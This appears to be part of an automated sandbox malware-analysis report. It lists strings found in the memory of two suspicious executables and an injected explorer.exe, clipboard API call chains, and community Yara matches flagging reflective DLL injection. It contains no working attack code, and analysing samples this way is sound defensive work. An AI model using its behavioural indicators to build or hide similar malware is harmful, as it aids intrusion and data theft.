                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003276000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000033FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000032DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000032DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000032DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
                  Source: 58B.tmp.zx.exe, 00000014.00000003.2269378400.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262938360.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270616048.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262788389.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262583394.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270146141.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262397211.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2263140535.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, libcrypto-1_1.dll.20.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                  Source: 58B.tmp.zx.exe, 00000014.00000003.2269378400.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262938360.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270616048.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262788389.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262583394.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270146141.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262397211.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2263140535.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, libcrypto-1_1.dll.20.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                  Source: 58B.tmp.zx.exe, 00000014.00000003.2269378400.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262938360.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270616048.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262788389.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262583394.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270146141.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262397211.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2263140535.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, libcrypto-1_1.dll.20.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                  Source: 58B.tmp.zx.exe, 00000014.00000003.2268535493.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2277382657.000001AE9585A000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2277653072.000001AE9585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/dev/peps/pep-0205/
                  Source: 58B.tmp.zx.exe, 00000015.00000003.2277102698.000001AE938CE000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000002.2279775888.000001AE95760000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.20.drString found in binary or memory: http://www.python.org/download/releases/2.3/mro/.
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.000000000421B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: explorer.exe, 00000007.00000003.2356186662.000000000C54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3098605799.000000000C50F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3100357011.000000000C54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3303824263.000000000C54C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2070956872.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                  Source: explorer.exe, 00000007.00000003.3099435384.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2053655662.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3296402764.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000000.2151588045.0000000000E52000.00000002.00000001.01000000.00000009.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                  Source: explorer.exe, 00000007.00000003.2352212980.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2061516657.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3299555771.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                  Source: explorer.exe, 00000007.00000000.2053655662.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3295868821.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                  Source: explorer.exe, 00000007.00000003.2354520978.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3293675921.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2051248349.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.000000000421B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.000000000421B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.000000000421B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.000000000421B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.000000000421B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.000000000421B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: explorer.exe, 00000007.00000002.3300553941.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2352212980.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3098529003.0000000009C05000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2061516657.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3101098577.0000000009C21000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                  Source: 58B.tmp.zx.exe, 00000015.00000003.2278152704.000001AE938B6000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2276633300.000001AE938BD000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000002.2278960219.000001AE938B9000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2276184702.000001AE9384F000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2278097969.000001AE93855000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2278032047.000001AE9382B000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2276184702.000001AE938B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                  Source: 58B.tmp.zx.exe, 00000015.00000002.2279415131.000001AE950C0000.00000004.00001000.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2276784309.000001AE938BB000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2276709161.000001AE938B4000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2276184702.000001AE938B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                  Source: 58B.tmp.zx.exe, 00000015.00000003.2276184702.000001AE938B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                  Source: 58B.tmp.zx.exe, 00000015.00000003.2278152704.000001AE938B6000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2276633300.000001AE938BD000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000002.2278960219.000001AE938B9000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2276184702.000001AE9384F000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2278097969.000001AE93855000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2278032047.000001AE9382B000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2276184702.000001AE938B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                  Source: 58B.tmp.zx.exe, 00000015.00000003.2278152704.000001AE938B6000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2276633300.000001AE938BD000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000002.2278960219.000001AE938B9000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2276184702.000001AE9384F000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2278097969.000001AE93855000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2278032047.000001AE9382B000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000015.00000003.2276184702.000001AE938B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                  Source: explorer.exe, 00000007.00000003.2352212980.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2061516657.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3300605901.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3098330596.0000000009C92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                  Source: explorer.exe, 00000007.00000002.3303409725.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2070956872.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                  Source: explorer.exe, 00000007.00000003.2352212980.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3299555771.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2061516657.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
                  Source: explorer.exe, 00000007.00000003.2352212980.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3299555771.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2061516657.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
                  Source: 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE6F000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2269378400.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262938360.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270616048.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262788389.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2269378400.000001E7FAE6F000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262583394.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270146141.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262397211.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2263140535.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE6C000.00000004.00000020.00020000.00000000.sdmp, libcrypto-1_1.dll.20.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.000000000421B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.000000000421B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: libcrypto-1_1.dll.20.drString found in binary or memory: https://www.openssl.org/H
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8C7CE0 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,7_2_0E8C7CE0
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8C7CE0 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,7_2_0E8C7CE0
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8C7AF0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_0E8C7AF0

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 7.3.explorer.exe.ca53600.6.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                  Source: 7.2.explorer.exe.e8b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                  Source: 7.2.explorer.exe.8b70000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                  Source: 7.2.explorer.exe.ca53600.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                  Source: 7.3.explorer.exe.ca53600.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                  Source: 6.2.svchost.exe.251e2e7d000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                  Source: 7.2.explorer.exe.8b70000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                  Source: 7.3.explorer.exe.ca53600.6.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                  Source: 7.3.explorer.exe.ca53600.5.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                  Source: 7.0.explorer.exe.8b70000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                  Source: 7.3.explorer.exe.ca53600.2.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                  Source: 7.2.explorer.exe.e8b0000.3.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                  Source: 7.2.explorer.exe.ca53600.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                  Source: 7.3.explorer.exe.ca53600.5.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                  Source: 7.3.explorer.exe.ca53600.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                  Source: 7.3.explorer.exe.ca53600.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                  Source: 7.3.explorer.exe.ca53600.9.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                  Source: 7.3.explorer.exe.ca53600.9.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                  Source: 7.0.explorer.exe.8b70000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                  Source: 6.2.svchost.exe.251e2e7d000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                  Source: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                  Source: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                  Source: 00000007.00000000.2060880149.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                  Source: 00000006.00000002.3291804673.00000251E2E7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
